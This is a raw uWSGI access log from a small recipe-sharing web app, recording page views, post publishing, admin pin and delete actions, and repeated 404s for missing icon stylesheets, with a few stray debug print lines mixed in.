/static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 23084 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1585] 219.228.146.93 () {38 vars in 856 bytes} [Wed Jan 13 06:12:29 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[] +[pid: 12823|app: 0|req: 1209/1586] 219.228.146.93 () {40 vars in 815 bytes} [Wed Jan 13 06:12:42 2021] GET /all-4-0-0 => generated 8759 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1210/1587] 219.228.146.93 () {40 vars in 811 bytes} [Wed Jan 13 06:12:44 2021] GET /all-0-0-0 => generated 9500 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1211/1588] 219.228.146.93 () {40 vars in 798 bytes} [Wed Jan 13 06:12:46 2021] GET /home/ => generated 9278 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1212/1589] 219.228.146.93 () {40 vars in 807 bytes} [Wed Jan 13 06:12:49 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1213/1590] 219.228.146.93 () {40 vars in 809 bytes} [Wed Jan 13 06:12:49 2021] GET /publish/ => generated 5083 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1214/1591] 219.228.146.93 () {40 vars in 798 bytes} [Wed Jan 13 06:12:54 2021] GET /home/ => generated 9278 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1215/1592] 219.228.146.93 () {40 vars in 809 bytes} [Wed Jan 13 06:12:58 2021] GET /edit-pwd => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1216/1593] 219.228.146.93 () {40 vars in 811 bytes} [Wed Jan 13 06:12:58 2021] GET /edit-pwd/ => generated 6882 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1217/1594] 219.228.146.93 () {40 vars in 798 bytes} [Wed Jan 13 06:13:01 2021] GET /home/ => generated 9278 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1218/1595] 83.97.20.21 () {26 vars in 277 bytes} [Wed Jan 13 06:29:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +肉夹馍 肉夹馍做法 +[pid: 12823|app: 0|req: 1219/1596] 219.228.146.132 () {48 vars in 1058 bytes} [Wed Jan 13 06:52:31 2021] POST /publish/ => generated 0 bytes in 23 msecs (HTTP/1.1 302) 7 headers in 202 bytes (12 switches on core 0) +[pid: 12823|app: 0|req: 1220/1597] 219.228.146.132 () {42 vars in 910 bytes} [Wed Jan 13 06:52:31 2021] GET /single/8 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1221/1598] 219.228.146.132 () {42 vars in 912 bytes} [Wed Jan 13 06:52:31 2021] GET /single/8/ => generated 8868 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1599] 219.228.146.132 () {38 vars in 798 bytes} [Wed Jan 13 06:52:31 2021] GET /static/img/t_photo/8_th.jpg => generated 14628 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 1222/1600] 219.228.146.132 () {40 vars in 875 bytes} [Wed Jan 13 06:52:43 2021] GET /home/ => generated 9280 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1223/1601] 219.228.146.132 () {40 vars in 889 bytes} [Wed Jan 13 06:52:49 2021] GET /admin-home/ => generated 11135 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1224/1602] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 06:52:49 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1225/1603] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:52:49 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1226/1604] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 06:52:49 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1227/1605] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 06:52:49 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1228/1606] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 06:52:49 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1229/1607] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:52:49 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1230/1608] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 06:52:49 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1231/1609] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 06:52:49 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1232/1610] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 06:52:49 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +zhiding +置顶 +[pid: 12823|app: 0|req: 1233/1611] 219.228.146.132 () {48 vars in 970 bytes} [Wed Jan 13 06:52:52 2021] POST /admin-home/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1234/1612] 219.228.146.132 () {40 vars in 889 bytes} [Wed Jan 13 06:52:52 2021] GET /admin-home/ => generated 11135 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1235/1613] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 06:52:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1236/1614] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 06:52:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1237/1615] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:52:52 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1238/1616] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 06:52:52 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1239/1617] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 06:52:52 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1240/1618] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 06:52:52 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1241/1619] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:52:52 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1242/1620] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 06:52:52 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1243/1621] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 06:52:52 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1244/1622] 219.228.146.132 () {42 vars in 906 bytes} [Wed Jan 13 06:52:55 2021] GET /home/ => generated 9686 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1623] 219.228.146.132 () {40 vars in 850 bytes} [Wed Jan 13 06:52:55 2021] GET /static/img/t_photo/8_th.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1624] 219.228.146.132 () {42 vars in 838 bytes} [Wed Jan 13 06:52:55 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +delete +[pid: 12823|app: 0|req: 1245/1625] 219.228.146.132 () {48 vars in 970 bytes} [Wed Jan 13 06:53:07 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1246/1626] 219.228.146.132 () {40 vars in 889 bytes} [Wed Jan 13 06:53:07 2021] GET /admin-home/ => generated 9585 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1247/1627] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 06:53:07 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1248/1628] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 06:53:07 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1249/1629] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 06:53:07 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1250/1630] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 06:53:07 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1251/1631] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:53:07 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1252/1632] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:53:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1253/1633] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 06:53:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1254/1634] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 06:53:07 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1255/1635] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 06:53:07 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +delete +[pid: 12823|app: 0|req: 1256/1636] 219.228.146.132 () {48 vars in 970 bytes} [Wed Jan 13 06:53:09 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1257/1637] 219.228.146.132 () {40 vars in 889 bytes} [Wed Jan 13 06:53:09 2021] GET /admin-home/ => generated 8052 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 1258/1638] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 1259/1639] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 1260/1640] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 1261/1641] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 1262/1642] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 1263/1643] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 1264/1644] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 1265/1645] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 06:53:09 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 1266/1646] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 06:53:09 2021] GET /static/css/animate.css => generated 3430 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1267/1647] 219.228.146.132 () {40 vars in 877 bytes} [Wed Jan 13 06:53:15 2021] GET /publish/ => generated 5083 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +东坡肉 东坡肉做法 +[pid: 12823|app: 0|req: 1268/1648] 219.228.146.132 () {48 vars in 1058 bytes} [Wed Jan 13 06:56:39 2021] POST /publish/ => generated 0 bytes in 14 msecs (HTTP/1.1 302) 7 headers in 202 bytes (8 switches on core 0) +[pid: 12823|app: 0|req: 1269/1649] 219.228.146.132 () {42 vars in 910 bytes} [Wed Jan 13 06:56:39 2021] GET /single/9 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1270/1650] 219.228.146.132 () {42 vars in 912 bytes} [Wed Jan 13 06:56:39 2021] GET /single/9/ => generated 9369 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1651] 219.228.146.132 () {38 vars in 808 bytes} [Wed Jan 13 06:56:39 2021] GET /static/img/t_photo/9_th%20(1).jpg => generated 13980 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 1271/1652] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 07:08:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1272/1653] 219.228.146.93 () {40 vars in 815 bytes} [Wed Jan 13 07:11:11 2021] GET /single-an-7 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1273/1654] 219.228.146.93 () {40 vars in 817 bytes} [Wed Jan 13 07:11:11 2021] GET /single-an-7/ => generated 3067 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1655] 219.228.146.93 () {38 vars in 767 bytes} [Wed Jan 13 07:11:11 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1656] 219.228.146.93 () {38 vars in 751 bytes} [Wed Jan 13 07:11:11 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1657] 219.228.146.93 () {38 vars in 768 bytes} [Wed Jan 13 07:11:11 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1658] 219.228.146.93 () {38 vars in 749 bytes} [Wed Jan 13 07:11:11 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1659] 219.228.146.93 () {38 vars in 776 bytes} [Wed Jan 13 07:11:11 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1660] 219.228.146.93 () {38 vars in 770 bytes} [Wed Jan 13 07:11:11 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1661] 219.228.146.93 () {38 vars in 772 bytes} [Wed Jan 13 07:11:11 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1662] 219.228.146.93 () {38 vars in 754 bytes} [Wed Jan 13 07:11:12 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1663] 219.228.146.93 () {38 vars in 788 bytes} [Wed Jan 13 07:11:12 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1664] 219.228.146.93 () {38 vars in 764 bytes} [Wed Jan 13 07:11:12 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1665] 219.228.146.93 () {38 vars in 796 bytes} [Wed Jan 13 07:11:14 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 1274/1666] 219.228.146.93 () {40 vars in 797 bytes} [Wed Jan 13 07:11:17 2021] GET /home/ => generated 9684 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1667] 219.228.146.93 () {38 vars in 795 bytes} [Wed Jan 13 07:11:17 2021] GET /static/img/t_photo/8_th.jpg => generated 14628 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1668] 219.228.146.93 () {38 vars in 795 bytes} [Wed Jan 13 07:11:17 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 1275/1669] 219.228.146.93 () {40 vars in 808 bytes} [Wed Jan 13 07:11:23 2021] GET /single/8 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1276/1670] 219.228.146.93 () {40 vars in 810 bytes} [Wed Jan 13 07:11:23 2021] GET /single/8/ => generated 8866 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1671] 219.228.146.93 () {38 vars in 759 bytes} [Wed Jan 13 07:11:23 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1672] 219.228.146.93 () {38 vars in 761 bytes} [Wed Jan 13 07:11:23 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1673] 219.228.146.93 () {38 vars in 799 bytes} [Wed Jan 13 07:11:23 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 1277/1674] 219.228.146.93 () {40 vars in 797 bytes} [Wed Jan 13 07:12:23 2021] GET /home/ => generated 9684 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1278/1675] 219.228.146.93 () {40 vars in 810 bytes} [Wed Jan 13 07:12:27 2021] GET /all-0-0-0 => generated 9499 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1676] 219.228.146.93 () {38 vars in 809 bytes} [Wed Jan 13 07:12:27 2021] GET /static/img/t_photo/9_th%20(1).jpg => generated 13980 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 1279/1677] 219.228.146.93 () {40 vars in 812 bytes} [Wed Jan 13 07:12:32 2021] GET /single/9 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1280/1678] 219.228.146.93 () {40 vars in 814 bytes} [Wed Jan 13 07:12:32 2021] GET /single/9/ => generated 9367 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /single +[pid: 12823|app: 0|req: 1281/1679] 219.228.146.93 () {38 vars in 758 bytes} [Wed Jan 13 07:13:56 2021] GET /single => generated 3382 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 12823|app: 0|req: 1282/1680] 219.228.146.93 () {34 vars in 524 bytes} [Wed Jan 13 07:13:56 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1283/1681] 219.228.146.93 () {40 vars in 815 bytes} [Wed Jan 13 07:13:58 2021] GET /single/9/ => generated 9367 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1284/1682] 219.228.146.132 () {40 vars in 875 bytes} [Wed Jan 13 07:18:06 2021] GET /home/ => generated 9686 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1683] 219.228.146.132 () {40 vars in 850 bytes} [Wed Jan 13 07:18:06 2021] GET /static/img/t_photo/8_th.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +0 +0 +[, ] +[pid: 12823|app: 0|req: 1285/1684] 219.228.146.132 () {40 vars in 879 bytes} [Wed Jan 13 07:18:15 2021] GET /all-1-0-0 => generated 9501 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1685] 219.228.146.132 () {40 vars in 864 bytes} [Wed Jan 13 07:18:15 2021] GET /static/img/t_photo/9_th%20(1).jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 1286/1686] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 07:18:24 2021] GET /single/8/ => generated 8868 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1287/1687] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 07:52:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1288/1688] 83.97.20.21 () {26 vars in 277 bytes} [Wed Jan 13 08:33:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 